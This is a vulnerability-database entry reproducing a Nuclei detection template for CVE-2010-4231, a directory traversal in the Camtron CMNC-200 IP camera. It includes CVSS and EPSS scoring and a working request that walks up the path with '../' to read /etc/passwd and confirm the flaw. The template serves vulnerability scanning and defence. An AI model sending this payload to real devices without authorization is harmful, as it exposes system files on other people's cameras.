Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-4231
HistoryJul 16, 2021 - 5:29 p.m.

Camtron CMNC-200 IP Camera - Directory Traversal

2021-07-1617:29:30
ProjectDiscovery
github.com
4

6.2 Medium

AI Score

Confidence

High

7.8 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

0.016 Low

EPSS

Percentile

87.4%

The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.

id: CVE-2010-4231

info:
  name: Camtron CMNC-200 IP Camera - Directory Traversal
  author: daffainfo
  severity: high
  description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files and directories on the camera.
  remediation: Upgrade to a supported product version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
    - https://www.exploit-db.com/exploits/15505
    - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
    - http://www.exploit-db.com/exploits/15505/
    - https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cve-id: CVE-2010-4231
    cwe-id: CWE-22
    epss-score: 0.01615
    epss-percentile: 0.87178
    cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: camtron
    product: cmnc-200_firmware
  tags: cve,cve2010,iot,lfi,camera,edb,camtron

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950

6.2 Medium

AI Score

Confidence

High

7.8 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

0.016 Low

EPSS

Percentile

87.4%